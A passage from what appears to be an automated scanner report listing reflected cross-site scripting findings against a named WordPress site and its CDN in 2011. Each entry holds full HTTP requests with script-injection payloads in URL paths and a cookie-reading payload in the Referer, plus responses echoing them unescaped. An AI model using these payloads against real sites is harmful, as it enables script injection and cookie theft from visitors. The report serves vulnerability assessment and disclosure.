<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content2db02\"><script>alert(1)</script>561302ac03e/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1&amp;_login=26b7466406">
...[SNIP]...

3.35. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/grunion-contact-form/css/grunion.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/plugins/grunion-contact-form/css/grunion.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43df5"><script>alert(1)</script>8ce814d076d was submitted in the REST URL parameter 2. This input was echoed as 43df5\"><script>alert(1)</script>8ce814d076d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins43df5"><script>alert(1)</script>8ce814d076d/grunion-contact-form/css/grunion.css?ver=3.1.1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:08:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:08:25 GMT
Cache-Control: max-age=86400
X-Varnish: 1668604651
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 43033

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content/plugins43df5\"><script>alert(1)</script>8ce814d076d/grunion-contact-form/css/grunion.css?ver=3.1.1&amp;_login=f8359160b1">
...[SNIP]...

3.36. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/grunion-contact-form/css/grunion.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/plugins/grunion-contact-form/css/grunion.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd478"><script>alert(1)</script>dd6edca9943 was submitted in the REST URL parameter 5. This input was echoed as bd478\"><script>alert(1)</script>dd6edca9943 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/grunion-contact-form/css/grunion.cssbd478"><script>alert(1)</script>dd6edca9943?ver=3.1.1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:08:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:08:56 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 42982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content/plugins/grunion-contact-form/css/grunion.cssbd478\"><script>alert(1)</script>dd6edca9943?ver=3.1.1&amp;_login=3627315853">
...[SNIP]...

3.37. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/sidebar-login/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/plugins/sidebar-login/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cc84"><script>alert(1)</script>24036739709 was submitted in the REST URL parameter 1. This input was echoed as 9cc84\"><script>alert(1)</script>24036739709 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content9cc84"><script>alert(1)</script>24036739709/plugins/sidebar-login/style.css?ver=3.1.1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:07:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:07:55 GMT
Cache-Control: max-age=86400
X-Varnish: 1668602176
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 42994

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content9cc84\"><script>alert(1)</script>24036739709/plugins/sidebar-login/style.css?ver=3.1.1&amp;_login=65bccf194b">
...[SNIP]...

3.38. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/sidebar-login/style.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/plugins/sidebar-login/style.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21ed3"><script>alert(1)</script>ff23996d7ad was submitted in the REST URL parameter 2. This input was echoed as 21ed3\"><script>alert(1)</script>ff23996d7ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins21ed3"><script>alert(1)</script>ff23996d7ad/sidebar-login/style.css?ver=3.1.1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:08:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:08:25 GMT
Cache-Control: max-age=86400
X-Varnish: 1668604652
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 42944

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content/plugins21ed3\"><script>alert(1)</script>ff23996d7ad/sidebar-login/style.css?ver=3.1.1&amp;_login=283d6799c0">
...[SNIP]...

3.39. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/sidebar-login/style.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/plugins/sidebar-login/style.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41abd"><script>alert(1)</script>143b5139f95 was submitted in the REST URL parameter 4. This input was echoed as 41abd\"><script>alert(1)</script>143b5139f95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sidebar-login/style.css41abd"><script>alert(1)</script>143b5139f95?ver=3.1.1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:08:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:08:56 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 42971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content/plugins/sidebar-login/style.css41abd\"><script>alert(1)</script>143b5139f95?ver=3.1.1&amp;_login=242aca52e2">
...[SNIP]...

3.40. http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/themes/atahualpa/images/favicon/fff-link.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23c07"><script>alert(1)</script>ac1ebf8b1b6 was submitted in the REST URL parameter 1. This input was echoed as 23c07\"><script>alert(1)</script>ac1ebf8b1b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content23c07"><script>alert(1)</script>ac1ebf8b1b6/themes/atahualpa/images/favicon/fff-link.ico HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:08:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:08:31 GMT
Cache-Control: max-age=86400
X-Varnish: 1668605031
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 42975

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content23c07\"><script>alert(1)</script>ac1ebf8b1b6/themes/atahualpa/images/favicon/fff-link.ico/?_login=4665c5857f">
...[SNIP]...

3.41. http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/themes/atahualpa/images/favicon/fff-link.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3b95"><script>alert(1)</script>57b77ffa238 was submitted in the REST URL parameter 2. This input was echoed as f3b95\"><script>alert(1)</script>57b77ffa238 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themesf3b95"><script>alert(1)</script>57b77ffa238/atahualpa/images/favicon/fff-link.ico HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:09:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:09:01 GMT
Cache-Control: max-age=86400
X-Varnish: 1668607349
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 43005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content/themesf3b95\"><script>alert(1)</script>57b77ffa238/atahualpa/images/favicon/fff-link.ico/?_login=cdabbcebf9">
...[SNIP]...

3.42. http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/themes/atahualpa/images/favicon/fff-link.ico

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd8f9"><script>alert(1)</script>bd1c2d36605 was submitted in the REST URL parameter 6. This input was echoed as cd8f9\"><script>alert(1)</script>bd1c2d36605 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/atahualpa/images/favicon/fff-link.icocd8f9"><script>alert(1)</script>bd1c2d36605 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:09:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:09:24 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 43000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.icocd8f9\"><script>alert(1)</script>bd1c2d36605/?_login=a5483e57b0">
...[SNIP]...

3.43. http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/themes/atahualpa/js/DD_roundies.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 646e0"><script>alert(1)</script>27728feb339 was submitted in the REST URL parameter 1. This input was echoed as 646e0\"><script>alert(1)</script>27728feb339 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content646e0"><script>alert(1)</script>27728feb339/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:08:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:08:01 GMT
Cache-Control: max-age=86400
X-Varnish: 1668602724
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 42983

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content646e0\"><script>alert(1)</script>27728feb339/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a&amp;_login=10957bbbdd">
...[SNIP]...

3.44. http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/themes/atahualpa/js/DD_roundies.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57026"><script>alert(1)</script>74b1e57ccc9 was submitted in the REST URL parameter 2. This input was echoed as 57026\"><script>alert(1)</script>74b1e57ccc9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes57026"><script>alert(1)</script>74b1e57ccc9/atahualpa/js/DD_roundies.js?ver=0.0.2a HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:08:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:08:31 GMT
Cache-Control: max-age=86400
X-Varnish: 1668605038
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 43006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content/themes57026\"><script>alert(1)</script>74b1e57ccc9/atahualpa/js/DD_roundies.js?ver=0.0.2a&amp;_login=9ba590e89e">
...[SNIP]...

3.45. http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/themes/atahualpa/js/DD_roundies.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b46e"><script>alert(1)</script>5ec3496cd24 was submitted in the REST URL parameter 5. This input was echoed as 2b46e\"><script>alert(1)</script>5ec3496cd24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/atahualpa/js/DD_roundies.js2b46e"><script>alert(1)</script>5ec3496cd24?ver=0.0.2a HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:09:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:09:01 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 43040

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js2b46e\"><script>alert(1)</script>5ec3496cd24?ver=0.0.2a&amp;_login=5410b6ce8a">
...[SNIP]...

3.46. http://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-includes/js/l10n.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 398c9"><script>alert(1)</script>4e487c44e11 was submitted in the REST URL parameter 1. This input was echoed as 398c9\"><script>alert(1)</script>4e487c44e11 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes398c9"><script>alert(1)</script>4e487c44e11/js/l10n.js?ver=20101110 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:07:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:07:49 GMT
Cache-Control: max-age=86400
X-Varnish: 1668601693
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 42893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-includes398c9\"><script>alert(1)</script>4e487c44e11/js/l10n.js?ver=20101110&amp;_login=7b94eab575">
...[SNIP]...

3.47. http://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-includes/js/l10n.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e502"><script>alert(1)</script>87deeb2ec4f was submitted in the REST URL parameter 3. This input was echoed as 5e502\"><script>alert(1)</script>87deeb2ec4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/l10n.js5e502"><script>alert(1)</script>87deeb2ec4f?ver=20101110 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:08:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:08:21 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 42947

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
